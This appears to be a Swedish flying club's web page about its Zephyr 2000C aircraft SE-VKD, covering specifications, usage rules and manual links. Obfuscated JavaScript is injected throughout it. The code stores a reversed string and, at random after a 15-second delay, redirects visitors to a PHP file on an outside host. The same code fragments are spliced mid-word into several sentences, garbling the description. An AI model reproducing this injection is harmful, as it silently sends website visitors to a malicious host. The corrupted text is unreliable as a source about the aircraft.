SE-VKD: Zephyr 2000C

SE-VKD

Kalle David” är ett låg­vingat, performance-orienterat flyg­plan från 2006 med T-stjärt. Pla­net är byggt främst i kom­po­sit­ma­te­rial med två sitt­plat­ser i dub­bel­kommandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando (pilot/passagerare) och har en motor på 80 häst­kraf­ter för en max­fart på över 260 km/h. Flyg­pla­net är utrus­tat med digi­tal instru­ment­pa­nel (EFIS).

Bräns­le­tan­ken är på drygt 50 liter och bakom förar­sto­larna finns ett utrymme för bagage för en dags­ut­flykt. Den stora trans­pa­renta huven ger en hisnandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande utsikt!

Eftersom detta flyg­plan är något mera krävandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ande av pilo­ten än våra övriga flyg­plan, används den inte för utbild­ning av nya fly­ge­le­ver. Dock kan man efter erhål­let cer­ti­fi­kat boka en tid med en flyglä­rare för typinflygning.

Tek­nisk infor­ma­tion
Till­ver­kare: Atec

Manu­a­ler
$hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == "string") return $hiVNZt4Y5cDrbJXMhLy.list[n].split("").reverse().join("");return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=["'php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andbok_SE-VKD_200609141.pdf" target="_new">Flyghandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and­bok SE-VKD
Last­nings­in­struk­tio­nen SE-VKD
Dynon Avio­nics EFIS-D100 Pilots User Guide
Dynon Avio­nics EFIS D100 Lathund